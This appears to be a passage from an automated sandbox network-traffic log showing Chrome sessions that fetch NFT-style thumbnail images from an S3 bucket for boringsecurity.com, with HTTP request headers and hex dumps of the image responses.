                                                                          2023-12-10 16:45:02 UTC415INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 72 33 42 43 50 39 61 42 6e 54 59 51 67 37 37 45 59 37 31 70 65 52 4e 59 52 4d 71 74 65 6e 31 72 4e 6f 30 53 70 32 75 57 75 6f 4c 47 56 54 6f 41 43 6d 55 4c 50 74 56 44 49 38 41 73 73 43 79 70 47 44 57 47 59 51 37 68 6f 61 34 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 31 45 56 54 57 38 50 36 57 35 57 31 4d 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 30 20 4f 63 74 20 32 30 32 32 20 31 31 3a 34 30 3a 34 32 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 31 35 39 31 35 33 39 63 34 34 62 66 34 38 36 34 30 63 39 38 35 30
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: r3BCP9aBnTYQg77EY71peRNYRMqten1rNo0Sp2uWuoLGVToACmULPtVDI8AssCypGDWGYQ7hoa4=x-amz-request-id: 8ZZ1EVTW8P6W5W1MDate: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Mon, 10 Oct 2022 11:40:42 GMTETag: "1591539c44bf48640c9850
                                                                          2023-12-10 16:45:02 UTC13664INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 02 00 00 00 05 da 55 1a 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 5d 05 54 54 5b 17 be 34 48 88 85 8a d8 89 a2 98 28 76 77 77 b7 d8 dd 4a 37 76 3d c5 16 c4 4e 18 86 9c 9e a1 19 86 01 04 a4 24 44 51 30 51 89 89 f3 af 7d 0f f2 78 28 3e c4 81 19 df ef 5d 67 bd c5 c3 cb 70 39 df dd fb ec f3 ed 6f ef 43 84 87 a3 3f 23 fc bf 35 09 44 48 08 fa 33 42 fe 5b 93 f0 07 54 24 77 0c fe 80 2a ff 29 0b 51 f8 f1 c7 52 91 dc 31 f8 03 aa fc a7 2c 44 e1 c7 1f 4b 45 72 c7 e0 0f a8 f2 9f b2 10 85 1f 7f 2c 15 c9 1d 83 3f a0 ca 7f ca 42 14 7e fc b1 54 24 77 0c fe 80 2a ff 29 0b 51 f8 f1 c7 52 91 dc 31 f8 03 aa fc a7 2c 44 e1 c7 1f 4b 45 72 c7 e0 0f a8
                                                                          Data Ascii: PNGIHDRUpHYs IDATx]TT[4H(vwwJ7v=N$DQ0Q}x(>]gp9oC?#5DH3B[T$w*)QR1,DKEr,?B~T$w*)QR1,DKEr


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          203192.168.2.54993752.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC391OUTGET /thumbnail_kfxape_034a85ee89.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:03 UTC415INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 49 37 4c 33 70 45 39 32 6b 4c 73 59 35 66 62 44 6f 6e 68 47 70 5a 43 32 62 72 51 58 64 2b 79 71 69 56 66 59 70 52 5a 55 6c 64 61 37 50 65 4c 75 5a 6d 4c 4e 72 77 6c 42 2f 49 74 48 69 69 72 53 6e 66 4e 31 52 56 35 62 4d 56 6b 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 39 43 52 47 30 30 31 4a 38 36 5a 56 42 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 32 34 20 4f 63 74 20 32 30 32 32 20 30 39 3a 35 36 3a 35 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 35 35 30 64 64 61 39 30 32 37 36 38 38 62 34 39 36 30 35 36 33 62
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: I7L3pE92kLsY5fbDonhGpZC2brQXd+yqiVfYpRZUlda7PeLuZmLNrwlB/ItHiirSnfN1RV5bMVk=x-amz-request-id: 8ZZ9CRG001J86ZVBDate: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Mon, 24 Oct 2022 09:56:50 GMTETag: "550dda9027688b4960563b
                                                                          2023-12-10 16:45:03 UTC8494INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec 9d 77 58 93 d7 db c7 69 6d dd b2 f7 26 6c 92 b0 f7 de 7b ef bd 37 82 28 68 b5 5a 57 eb 6e 5d 55 14 65 b8 b7 dd 6a 6b ab b5 b6 8e 3a aa ad 76 6f fb 76 57 41 b2 81 9c fb bd ee 93 3c 18 10 b5 f3 27 28 7f 9c 2b 40 20 c0 f3 7c f2 bd e7 b9 8f d2 c6 06 bb 51 9f 9f cc 56 b2 3e f1 fc b8 2b 9b bd a6 7e d7 ec fc c1 2f 1b b8 82 eb 4d ec 9e eb 4d 9c 91 35 72 0d 7a fe c6 35 e8 fd b5 89 cb ff ae d9 e5 f2 87 2d de d3 46 bf b6 71 cc 17 6f a5 2a ad 9f 6a 37 4a e9 ca bb f9 4a cd 7b 4a f5 bf dd e4 7a f6 c6 06 0e dc 6c 62 43 c7 06 5c 1c f9 e3 c8 1a b9 06 ec bf 75 0d 6e 36 d9 01 32 f5
                                                                          Data Ascii: PNGIHDRMpHYs IDATxwXim&l{7(hZWn]Uejk:vovWA<'(+@ |QV>+~/MM5rz5-Fqo*j7JJ{JzlbC\un62
                                                                          2023-12-10 16:45:03 UTC9000INData Raw: 97 05 1a 43 49 10 0b 02 6c 55 84 3f af b1 ed 96 b5 e0 8f 94 b6 6e 53 38 ba a7 74 13 17 2e 3d 6d 29 08 b2 d3 90 a0 e9 c3 62 bd af 95 3a 24 7a 9a f2 3e 3d de dc 23 f7 df fa 4c 2a 46 66 98 7f 7b ba 21 8f 2a 19 f3 75 04 8d 2e 39 78 18 b1 7e f5 6e 1b 64 86 39 91 22 5f 43 f4 0d 15 14 ce 8c 02 e7 67 a9 da 13 e2 61 c3 cf 4a 08 c2 a4 30 18 18 ea 91 e0 78 7f 42 4b 4c d5 e9 04 23 d5 fc da 2c c8 ae 4e 83 65 4d cf c1 b1 33 e7 e1 d5 e3 ef c0 81 23 6f 76 6f de b9 57 34 79 fa 2c b1 ae ae 0e 9f 63 a6 46 dc ed 0c 20 21 c0 96 54 a4 7a 91 9a 2c 7f 52 96 e6 4f 6a b2 43 c9 e4 dc 70 92 16 ed 43 52 22 dc 60 7a 71 24 c4 f8 d9 81 95 b1 96 c4 c9 de 52 18 10 e4 da e5 19 e0 ca 73 f4 73 10 56 34 d6 4a 8e 9d 3e df 7b f0 d0 61 58 b5 61 23 49 4a 4d 25 63 c7 8d 07 35 d5 49 e2 0b af ae 16
                                                                          Data Ascii: CIlU?nS8t.=m)b:$z>=#L*Ff{!*u.9x~nd9"_CgaJ0xBKL#,NeM3#ovoW4y,cF !Tz,ROjCpCR"`zq$RssV4J>{aXa#IJM%c5I
                                                                          2023-12-10 16:45:03 UTC3472INData Raw: d8 4a 4f b9 c7 85 a5 01 f1 2e 06 54 b1 d0 47 c3 9b 89 95 84 da 08 0b 82 37 59 f1 74 99 bb af bb 1d d0 fb e7 15 ee 5e 4b a1 1d 8a 60 20 53 17 61 41 6a c3 f1 54 43 0a 9f d4 d7 5a 55 b8 30 59 87 f7 d3 1a 5b 89 7c 22 d2 6d ee c4 fd 86 e6 81 00 6e 90 68 13 70 24 03 76 ce ee aa 32 e2 07 da 4c e0 19 6b 8c 93 d8 1b ab 49 13 5c 0c a8 b9 c2 3d a5 f5 51 16 58 4a 42 b0 fa 92 b9 78 53 cb fe 62 6a e3 bf 5c 77 00 92 0c ec a5 93 95 dc 58 10 60 ab 43 d0 0f dd 5d 65 c4 c3 93 9f f1 9a 30 23 f1 47 80 fb f7 60 eb 53 35 34 27 68 3a 4f ce 36 17 84 d8 4d e0 eb aa 8c eb 09 e7 ea 52 d3 54 1f 65 81 87 b0 11 4c 6f c8 c1 1a 34 b7 a6 78 83 ff 2d 50 fe 09 a8 03 7f be bc 7f cb 7a df 1b 05 3b 90 f1 8d 94 ef 67 0a 78 9e 44 4d a8 46 17 06 43 8a b0 0d 67 e8 ee bb c2 29 c2 86 39 34 f4 d3 7e
                                                                          Data Ascii: JO.TG7Yt^K` SaAjTCZU0Y[|"mnhp$v2LkI\=QXJBxSbj\wX`C]e0#G`S54'h:O6MRTeLo4x-Pz;gxDMFCg)94~


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          204192.168.2.5499363.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC635OUTGET /thumbnail_redzin_temp_1898f990e6.jpeg HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:03 UTC447INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 58 33 32 63 67 2f 67 45 6d 35 31 4c 45 64 4e 4e 55 53 6c 42 55 35 66 61 4f 72 51 57 2b 39 45 56 69 33 49 57 56 57 48 43 69 57 31 4c 56 5a 51 39 46 55 65 63 69 70 32 36 47 41 44 63 33 4d 41 57 77 42 45 65 65 2b 77 2b 2f 76 61 38 55 6d 45 47 44 43 52 39 50 6d 5a 52 49 75 30 50 55 50 33 79 73 50 71 63 7a 78 54 52 79 4f 63 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 33 59 46 47 34 42 4b 43 56 46 52 46 50 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 32 20 4e 6f 76 20 32 30 32 33 20 32 32 3a 32 30 3a 35 30 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: X32cg/gEm51LEdNNUSlBU5faOrQW+9EVi3IWVWHCiW1LVZQ9FUecip26GADc3MAWwBEee+w+/va8UmEGDCR9PmZRIu0PUP3ysPqczxTRyOc=x-amz-request-id: 8ZZ3YFG4BKCVFRFPDate: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Sun, 12 Nov 2023 22:20:50 GM
                                                                          2023-12-10 16:45:03 UTC5081INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 9c 00 9c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 03 04 05 01 08 02 ff c4 00 4c 10 00 01 03 03 02 04 02 02 0d 06 0b 09 01 00 00 00 01 02 03 04 00 05 11 06 21 07 12 13 31 22 41 14 51 15 32 34 35 61 71 72 73 81 b1 b2 c1 d2 08 16 36 74 75 91 17 23 24 33 52 55 56 92 94
                                                                          Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("L!1"AQ245aqrs6tu#$3RUV


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          205192.168.2.54993952.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC389OUTGET /thumbnail_kupi_5990bb8872.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:03 UTC415INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 66 38 2b 61 52 50 38 79 71 62 6c 43 64 37 49 64 68 30 34 35 39 61 71 68 4e 58 48 77 37 67 6b 64 78 42 54 43 4b 6b 44 47 78 55 36 53 30 67 67 4b 58 2f 44 53 71 5a 43 6f 36 75 54 6c 5a 72 46 6c 30 59 7a 2f 49 63 32 54 43 62 73 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 46 59 34 48 46 33 51 4e 45 41 44 59 59 45 57 44 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 32 30 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 33 35 3a 30 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 39 31 35 35 36 63 34 62 65 65 37 66 38 65 66 61 64 35 32 33 65 63
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: f8+aRP8yqblCd7Idh0459aqhNXHw7gkdxBTCKkDGxU6S0ggKX/DSqZCo6uTlZrFl0Yz/Ic2TCbs=x-amz-request-id: FY4HF3QNEADYYEWDDate: Sun, 10 Dec 2023 16:45:04 GMTLast-Modified: Mon, 20 Nov 2023 06:35:03 GMTETag: "91556c4bee7f8efad523ec
                                                                          2023-12-10 16:45:03 UTC13475INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 07 7c 55 e5 dd c7 6f 06 10 42 12 32 d8 43 48 6e 6e 36 88 88 a3 2d 2d 2e 0a f8 6a ad 32 84 b0 97 58 2b 43 0b 24 8c 6c 08 19 40 06 ca 06 65 25 0c 07 84 e1 44 db 3a 6b ed 5b b7 ed 5b ad a0 42 85 2a 4b 05 57 f2 7b 3f ff e7 9c 73 ef 39 27 67 3c 67 dc 80 7d df f8 f9 79 03 dc 71 72 ce 37 bf ff ff ff fc 9f e7 39 9e b4 fb b6 22 ed 7e 49 db 90 f6 3b 95 e6 ca 34 2f a0 d4 f9 72 6d 47 6a 8e 4c b9 1a 5a 20 d3 42 41 29 7e ed 40 ca 22 95 16 6b 28 4f 47 f9 82 7c 5a 2a a8 b3 ae 42 97 64 e7 b3 f3 9b ff 0c d2 cf a7 fb f3 6b 9d 2b f5 f9 a4 73 2c 3b e7 ec 1a c8 af 89 d6 35 93 5f d3
                                                                          Data Ascii: PNGIHDRMpHYs IDATx|UoB2CHnn6--.j2X+C$l@e%D:k[[B*KW{?s9'g<g}yqr79"~I;4/rmGjLZ BA)~@"k(OG|Z*Bdk+s,;5_


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          206192.168.2.5499383.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC627OUTGET /thumbnail_MAYC_7e6a35562a.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:03 UTC447INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 52 63 5a 52 79 58 56 64 57 54 71 44 30 38 64 63 7a 63 50 68 72 47 74 47 68 57 68 4b 30 66 33 4f 67 56 31 66 33 61 63 38 43 6d 61 65 54 49 4e 46 69 6c 58 50 78 43 68 63 6d 61 42 63 77 73 4e 4e 4f 4e 6b 66 78 51 5a 69 72 62 57 78 53 73 74 69 39 72 49 56 34 32 71 30 58 33 41 52 64 4c 61 65 49 36 6a 4b 35 72 59 47 2b 6f 34 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 46 59 34 52 4d 57 42 59 52 47 33 43 33 35 38 35 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 34 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 30 20 4a 75 6e 20 32 30 32 33 20 30 36 3a 31 30 3a 30 36 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: RcZRyXVdWTqD08dczcPhrGtGhWhK0f3OgV1f3ac8CmaeTINFilXPxChcmaBcwsNNONkfxQZirbWxSsti9rIV42q0X3ARdLaeI6jK5rYG+o4=x-amz-request-id: FY4RMWBYRG3C3585Date: Sun, 10 Dec 2023 16:45:04 GMTLast-Modified: Tue, 20 Jun 2023 06:10:06 GM
                                                                          2023-12-10 16:45:03 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec 9d 05 78 55 57 d6 bf 53 8a 4b 0c 22 10 77 d7 1b 77 77 77 81 b8 27 c4 9d 10 62 c4 15 77 2f b4 50 4a 4b 81 96 1a b4 40 4b 71 77 77 a8 4e a7 33 53 7f ff cf 3d 21 94 76 e6 fb be 99 ff d7 af 32 93 f3 3c fb 39 57 ce bd 37 d9 e7 3d bf b5 d6 5e 6b ef 23 71 b6 d1 7e c4 de 32 91 44 83 9f 92 f4 d1 d9 76 4d 17 5a 1c af dc e8 74 e1 46 a7 eb 0f d7 3b 5c 7e b8 d1 e9 2a 7e 3c dc 86 fb 80 7f a6 0f 1e 33 23 b0 73 a1 c5 f1 aa 98 a9 86 40 0d e9 e3 b3 ed 25 ee 74 bb 8e 90 78 b7 cc 52 e2 f9 74 63 9d f3 cd 8e 17 c5 1f b8 d9 25 fe 90 f0 81 61 c8 86 21 e3 ff a7 0f 06 d9 71 f9 e1 e6 e3 e7
                                                                          Data Ascii: PNGIHDRMpHYs IDATxxUWSK"wwww'bw/PJK@KqwwN3S=!v2<9W7=^k#q~2DvMZtF;\~*~<3#s@%txRtc%a!q
                                                                          2023-12-10 16:45:03 UTC577INData Raw: 4c 1d 47 61 ed 78 dc 2c 06 72 a3 f2 d7 8c f4 d9 0f dc ef 69 7f 69 97 da c6 6e b2 0e d5 e0 35 94 fe 83 35 94 a6 1c b9 c8 6f e3 e2 c7 80 c1 c3 d0 36 b0 e6 b5 61 03 68 9e ef c2 ae a3 59 24 a4 4d a4 a8 c2 8d a3 e7 f3 38 76 39 ab a0 02 63 00 00 20 00 49 44 41 54 95 9c 62 13 7c 83 f4 a8 6c f0 24 25 db 99 82 ea 78 0e 5f 59 4b 7a 51 38 11 e1 91 4f 99 a7 8d e9 36 6d d8 8c 89 99 21 09 f1 b1 34 37 35 b3 fe ad b7 94 eb 32 86 6b 03 5d db 57 4c 6c 24 e3 4c 46 b3 7f cf db ca 63 59 ea 90 26 bf 96 bc be 8c 49 4e 13 28 9d 1c cf d2 0d f5 34 2d c8 a7 76 66 0e 19 c5 21 64 17 b9 12 9b 6c 49 66 81 31 f3 97 bb 32 64 58 4f de 08 d3 e6 eb 99 b6 bc 5f f7 f7 24 9a 3f 0c 6c ca c8 a4 46 4b de ab 33 67 8c c6 00 c6 d8 b8 e1 ec 17 89 ce 18 53 82 92 0a 18 67 35 11 27 df 70 42 52 4a 19 35
                                                                          Data Ascii: LGax,riin55o6ahY$M8v9c IDATb|l$%x_YKzQ8O6m!4752k]WLl$LFcY&IN(4-vf!dlIf12dXO_$?lFK3gSg5'pBRJ5
                                                                          2023-12-10 16:45:03 UTC500INData Raw: c8 2f 73 53 5a 09 c3 63 0c 59 bc ca 89 15 eb 43 08 8a 18 8b a7 ef 08 76 a7 8f 55 c6 0d fc 3d fa e8 0f 76 a7 6d 9f f4 f7 6a c7 53 ec a6 89 95 dd 04 2c 3c 23 15 b9 7d 23 73 3b c6 59 4e c0 c2 d1 0b 3b f7 20 5e 1b a6 c5 d0 11 3a 98 4f 0c c4 d4 52 8b b5 db 82 f9 e8 bb 99 6c 7f 3b 07 67 77 7d 2c ac 34 59 b9 31 9e fd a7 e2 59 bf 3b 80 93 57 72 d9 7d 24 9b a6 b9 e1 04 46 d9 12 9b ee c9 c2 35 d5 ac de 3e 83 0d 07 e6 b1 f7 cc 0a 8e df 58 cf fe 0b 6f b0 7e df 6c 96 6f 6e 60 e6 f2 7c c5 d6 ee 9e aa 6c b8 3c 70 61 25 c7 ae af 63 ee ca 2a 9a 17 16 73 e9 e3 1d 6c 3e bc 80 c5 eb ea 29 a9 8b 27 ab c8 9b 8a 06 1f 85 55 13 d3 ad 49 ce 36 64 e3 9e 00 0e 9c c8 a6 7e 8a 2f 25 53 ed c8 f1 18 ce 67 53 da 7a 53 ff f8 66 e8 bf 7c 0c d7 36 89 50 4a 92 1e ce 1a 45 ba 93 36 d6 0e 93
                                                                          Data Ascii: /sSZcYCvU=vmjS,<#}#s;YN; ^:ORl;gw},4Y1Y;Wr}$F5>Xo~lon`|l<pa%c*sl>)'UI6d~/%SgSzSf|6PJE6
                                                                          2023-12-10 16:45:03 UTC9000INData Raw: 62 12 6d 39 78 aa 98 63 17 f3 d9 b0 3b 8c 95 9b 3c c8 2d 31 25 39 cb 98 d4 6c 73 22 62 4d f1 0f 36 c2 d5 cb 00 bf e0 71 84 46 99 11 16 3d 9e f0 58 0b 42 a2 c6 e3 1f 62 8c b3 87 54 8b 1a c1 6b c3 fa d0 bb 6f 37 86 0c 7b 19 8d 91 bd 19 a9 d5 97 91 5a fd e8 db af 3b 7d fb 75 c5 c9 5d 83 ec 22 33 e6 2d f5 e3 f0 d9 62 ce de a8 e1 c6 47 8d d4 cc 72 a1 d8 f9 35 a5 71 fc 6f a9 87 e7 00 6c 77 9f 56 d7 5b f6 c9 c9 85 7c b9 2d fd e3 29 e6 fc 63 86 25 df cd 32 e7 54 81 1e 69 8e c3 31 1c 67 83 7d 40 18 de 29 39 c4 16 35 10 9d 5d 4d 4c 5e 35 be 71 92 e9 46 31 6d 9e 0d 27 ae 14 28 eb ad b7 be 98 ca 96 fd 59 4a c3 8a 6c 0f 94 3b 4d 64 f7 fd 3b 17 b3 d9 b4 37 98 25 6b 9d 68 9e 67 43 66 e1 58 26 ba 0c e1 a5 97 3a 28 c3 44 7a f5 ee 82 96 ee 2b 38 ba 8c 22 21 d5 96 aa 46 1f
                                                                          Data Ascii: bm9xc;<-1%9ls"bM6qF=XBbTko7{Z;}u]"3-bGr5qolwV[|-)c%2Ti1g}@)95]ML^5qF1m'(YJl;Md;7%khgCfX&:(Dz+8"!F
                                                                          2023-12-10 16:45:03 UTC4149INData Raw: 1a 72 e3 57 32 ad fc 34 93 0b 4f d2 98 7f 9e 86 ac 1b 54 c4 7f 48 69 d8 77 e4 07 3c 24 ca 0d 34 06 af 22 3d 55 d6 00 1b 94 b5 61 f9 81 d9 bd 7b 0f 45 25 05 e8 88 58 2c da d5 a0 21 3c c9 2b aa 66 66 ac 15 1f 37 b6 94 47 fe 6c 89 c3 ff 19 c3 b5 ed 6c 90 05 df d3 79 a3 88 0f 72 a1 20 a3 91 91 22 8c 6e 3d bc 11 2a 6f a0 d2 e3 0c 42 16 3f fb bd 8f e8 ff 15 ed 07 3d a1 9b c6 39 fa f6 b9 82 4e bf 0b 0c 1f 52 ca 44 93 d5 e4 fb df a7 36 ee 3b 6a 52 ee 52 9f 75 8d c9 f9 e7 98 52 7c 82 b4 88 79 04 79 65 50 57 d3 40 42 42 02 f3 e7 cd c7 cd cd 8d 8a f2 4a 8a cb 73 31 ea 1d 48 c3 e0 2b 9c d7 81 23 af 3d e2 60 ef 27 6c ec f0 4f a2 54 ae e2 2f ae 10 2a 6e 12 26 6e 29 20 8a 14 f7 88 16 1f 28 16 25 ee 29 8f c3 c5 6d c2 c4 7b 04 8b eb 04 89 ab 04 88 4b 04 a8 9c 27 50 ed 0c
                                                                          Data Ascii: rW24OTHiw<$4"=Ua{E%X,!<+ff7Gllyr "n=*oB?=9NRD6;jRRuR|yyePW@BBJs1H+#=`'lOT/*n&n) (%)m{K'P


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          207192.168.2.54994152.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:03 UTC431OUTGET /thumbnail_Bored_Ape_Yacht_Club_Bored_Ape_Yacht_Club_4073_1cb1c9b884.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
